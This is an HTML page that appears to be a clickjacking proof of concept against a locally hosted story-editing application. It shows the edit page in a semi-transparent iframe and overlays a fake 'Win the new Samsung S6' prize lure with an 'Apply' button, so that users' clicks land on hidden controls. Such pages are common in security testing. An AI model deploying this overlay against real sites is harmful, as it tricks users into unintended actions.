<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    <style>
        html, body {
            margin: 0;
            width: 100%;
            height: 100%;
            position: relative;
        }

        #storyIframe {
            position: absolute;
            margin: 0;
            width: 100%;
            height: 99%;
            border: 0;
            opacity: 0.5;
        }


        #hackTitle {
            position: absolute;
            top: 15px;
            width: 100%;
            text-align: center;
        }

        #applyButton {
            z-index: -1;
            position: absolute;
            left: 418px;
            top: 87px;
            height: 30px;
            width: 83px;
        }

        #hackImage {
            margin: auto;
            top: 134px;
            width: 80%;
            z-index: 1;
            display: block;
            position: inherit;
        }
    </style>
</head>
<body>
    <iframe id="storyIframe" src="http://localhost:12458/OMWebiSearch/Story/EditStory/Index/PDIsMjM3MDgsNTQ1MTA1ZWMtNjNjMy00ZmY0LTkwMjQtZTVlNjA2MzBlMDY5Pg=="></iframe>
    <h1 id="hackTitle">Win the new Samsung S6</h1>
    <button id="applyButton">Apply</button>
    <img src="http://blogs-images.forbes.com/ianmorris/files/2015/03/DSC_1757.jpg" id="hackImage" />
</body>
</html>
